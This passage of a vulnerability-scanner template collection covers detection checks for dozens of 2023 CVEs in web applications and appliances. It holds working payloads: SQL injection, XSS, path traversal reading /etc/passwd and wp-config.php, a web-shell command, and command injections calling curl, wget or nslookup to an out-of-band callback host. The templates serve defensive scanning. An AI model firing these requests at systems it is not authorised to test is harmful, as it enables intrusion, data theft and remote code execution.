\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-43177","info":{"name":"CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebInterface"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains_all(to_lower(header), \"currentauth\", \"crushauth\")"]}]},{"method":"POST","path":["{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"],"headers":{"Cookie":"CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}","as2-to":"X","user_name":"crushadmin{{dirname}}","user_log_path":"./WebInterface/{{dirname}}/","user_log_file":"{{filename}}","Content-Type":"application/x-www-form-urlencoded"},"body":"post=body\n","matchers":[{"type":"regex","regex":["crushadmin"]}]},{"method":"GET","path":["{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"crushadmin{{dirname}}\")"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-45375","info":{"name":"PrestaShop PireosPay - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/modules/pireospay/\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 10\nPOST /module/pireospay/validation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\najax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></textarea><script>alert(document.domain)</script>\")","contains(body_2, \"page_aajoda-testimonials\")"],"condition":"and"}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<itunes:email>\",\"</itunes:email>\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41763","info":{"name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Skype"]}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","<title>Wi-Fi APP Login</title>"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\":  \"on_publish\", \"app\":  \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\"?> <SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <SOAP:Header> <wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\"> <wsse:UsernameToken SOAP:mustUnderstand=\"false\"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\"> <execCLI xsd=\"false\"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","<text>","<received>"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["<text>\\n(.*)\\["]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3219","info":{"name":"EventON Lite < 2.1.2 - Arbitrary File Download","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-4114","info":{"name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Drinks & Extras\", \"Checkout\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36284","info":{"name":"QloApps 1.6.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["QloApps"],"case-insensitive":true}]},{"raw":["@timeout: 20s\nGET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"<span>Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT 